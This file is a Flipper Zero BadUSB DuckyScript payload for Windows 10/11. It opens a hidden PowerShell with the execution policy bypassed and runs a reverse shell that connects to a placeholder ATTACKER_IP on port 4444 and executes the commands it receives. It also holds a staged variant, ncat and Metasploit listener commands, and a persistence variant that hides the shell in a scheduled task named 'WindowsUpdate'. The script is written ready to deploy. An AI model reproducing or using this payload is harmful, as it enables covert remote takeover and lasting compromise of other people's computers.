REM ============================================================================
REM  FLLC | FU PERSON | BadUSB: PowerShell Reverse Shell
REM  Flipper Zero DuckyScript
REM ============================================================================
REM  Target: Windows 10/11
REM  Time: ~4 seconds
REM  Opens hidden PowerShell and connects back to attacker
REM  CONFIGURE: Change ATTACKER_IP and PORT before deployment
REM ============================================================================
REM  Prerequisite: Start listener on your machine FIRST
REM    ncat -lvnp 4444
REM    OR
REM    msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST YOUR_IP; set LPORT 4444; run"
REM ============================================================================
REM  Stealth: ██████░  (hidden window, but leaves PS process)
REM ============================================================================

DELAY 1000
GUI r
DELAY 500

REM Launch hidden PowerShell with execution policy bypass
STRING powershell -W Hidden -NoP -NonI -ep Bypass -C "$LHOST='ATTACKER_IP';$LPORT=4444;$c=New-Object Net.Sockets.TCPClient($LHOST,$LPORT);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=([Text.Encoding]::ASCII).GetString($b,0,$i);try{$r=(Invoke-Expression $d 2>&1|Out-String)}catch{$r=$_.Exception.Message};$sb=([Text.Encoding]::ASCII).GetBytes($r+'PS '+(Get-Location).Path+'> ');$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
ENTER
DELAY 500

REM ============================================================================
REM  ALTERNATIVE METHOD: Staged (two-step, more reliable)
REM  Uncomment below and comment above if single-line fails
REM ============================================================================
REM DELAY 1000
REM GUI r
REM DELAY 500
REM STRING powershell -W Hidden -NoP -NonI -ep Bypass
REM ENTER
REM DELAY 800
REM STRING $c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444)
REM ENTER
REM DELAY 200
REM STRING $s=$c.GetStream();[byte[]]$b=0..65535|%{0}
REM ENTER
REM DELAY 200
REM STRING while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=([Text.Encoding]::ASCII).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([Text.Encoding]::ASCII).GetBytes($r+"PS "+(pwd).Path+"> ");$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()
REM ENTER
REM DELAY 200

REM ============================================================================
REM  PERSISTENCE VARIANT: Installs scheduled task for reconnection
REM  Uncomment if you want the shell to survive reboots
REM ============================================================================
REM DELAY 1000
REM GUI r
REM DELAY 500
REM STRING powershell -W Hidden -NoP -ep Bypass -C "$a='powershell -W Hidden -NoP -ep Bypass -C \"while($true){try{$c=New-Object Net.Sockets.TCPClient(''ATTACKER_IP'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=([Text.Encoding]::ASCII).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([Text.Encoding]::ASCII).GetBytes($r+''PS ''+(pwd).Path+''> '');$s.Write($sb,0,$sb.Length)};$c.Close()}catch{Start-Sleep 30}}\"';$t=New-ScheduledTaskAction -Execute 'powershell' -Argument $a;$tr=New-ScheduledTaskTrigger -AtLogon;Register-ScheduledTask -TaskName 'WindowsUpdate' -Action $t -Trigger $tr -Force|Out-Null"
REM ENTER
